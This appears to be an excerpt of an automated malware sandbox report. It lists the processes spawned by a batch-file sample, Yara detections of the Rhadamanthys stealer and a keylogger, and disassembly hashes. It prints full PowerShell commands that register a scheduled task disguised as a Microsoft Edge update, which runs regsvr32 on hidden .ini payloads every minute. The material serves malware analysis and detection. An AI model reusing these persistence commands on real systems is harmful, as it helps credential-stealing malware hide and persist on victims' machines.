                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:14:51:23
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Users\Public\ajbs50ul.bat
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\Public\ajbs50ul.bat"
                                                                                                      Imagebase:0x7ff79e8f0000
                                                                                                      File size:2'322'503 bytes
                                                                                                      MD5 hash:8837DF25AABC4FAD85E851ACA192F714
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:14:51:24
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:14:51:24
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:14:51:28
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
                                                                                                      Imagebase:0x7ff6f5940000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:14:51:28
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Users\user\Desktop\utox_x86_x64.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\utox_x86_x64.exe"
                                                                                                      Imagebase:0x7ff7b4ee0000
                                                                                                      File size:4'971'787 bytes
                                                                                                      MD5 hash:E9679980AA73CFC7CF00F3DA7949C661
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:14:51:33
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\OpenWith.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\openwith.exe"
                                                                                                      Imagebase:0x7ff75f2a0000
                                                                                                      File size:123'984 bytes
                                                                                                      MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:14:51:35
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
                                                                                                      Imagebase:0x7ff6f5940000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:14:51:59
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Program Files\Windows Media Player\wmpnscfg.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Windows Media Player\wmpnscfg.exe"
                                                                                                      Imagebase:0x7ff7253d0000
                                                                                                      File size:71'168 bytes
                                                                                                      MD5 hash:F912FF78DE347834EA56CEB0E12F80EC
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:14:52:02
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\dllhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                      Imagebase:0x7ff7d8730000
                                                                                                      File size:21'312 bytes
                                                                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:14:52:06
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\rekeywiz.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\rekeywiz.exe"
                                                                                                      Imagebase:0x7ff6e47f0000
                                                                                                      File size:122'880 bytes
                                                                                                      MD5 hash:A24EFFD38DDC2FFAB4F0592CA2CC585E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:14:52:09
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\rekeywiz.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\rekeywiz.exe"
                                                                                                      Imagebase:0x7ff6e47f0000
                                                                                                      File size:122'880 bytes
                                                                                                      MD5 hash:A24EFFD38DDC2FFAB4F0592CA2CC585E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:18
                                                                                                      Start time:14:52:09
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:14:52:09
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:22
                                                                                                      Start time:14:52:12
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                                                                                                      Imagebase:0x7ff6f5940000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:23
                                                                                                      Start time:14:52:28
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                                                                                                      Imagebase:0x7ff6f5940000
                                                                                                      File size:25'088 bytes
                                                                                                      MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 00007FFAAC5312F9 Relevance: .3, Instructions: 263COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1556506092.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7ffaac530000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1b832607436038da86ccb4e2d5ecdd246f3b81c164878eabdcdce2e9dfa11762
                                                                                                        • Instruction ID: e2bc7d6239ab18a916aa2b844e0c0adca3e492b6a373c181ed1473538eb44791
                                                                                                        • Opcode Fuzzy Hash: 1b832607436038da86ccb4e2d5ecdd246f3b81c164878eabdcdce2e9dfa11762
                                                                                                        • Instruction Fuzzy Hash: F3714A22E5EB878FF799973C586257676C5EF82210B5881BEE44EC76D3DD08E80943C1
                                                                                                        Function 00007FFAAC5313F4 Relevance: .1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1556506092.00007FFAAC530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC530000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7ffaac530000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4bb5d773cc577d922fdebaed148470feb1f2829a9a404de52a2112ef06f6a88a
                                                                                                        • Instruction ID: 78181d111e24687cbdaf17322e472b9e0c89e154f8abfdf10e3a66ce31017020
                                                                                                        • Opcode Fuzzy Hash: 4bb5d773cc577d922fdebaed148470feb1f2829a9a404de52a2112ef06f6a88a
                                                                                                        • Instruction Fuzzy Hash: 4C210622E5EB878BF395973C986117566C6EF82610B5880BAE04EC72D3DD18EC0983C1
                                                                                                        Function 00007FFAAC4637B5 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.1555928570.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_1_2_7ffaac460000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 8dbe3ac68405ee8cf02856f788fac10d96bee976c06bcd6e0b41bab1af8c3345
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: 6201A77010CB0C8FD748EF0CE051AA6B7E0FB85324F10052DE58AC3665D732E882CB45

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:0.9%
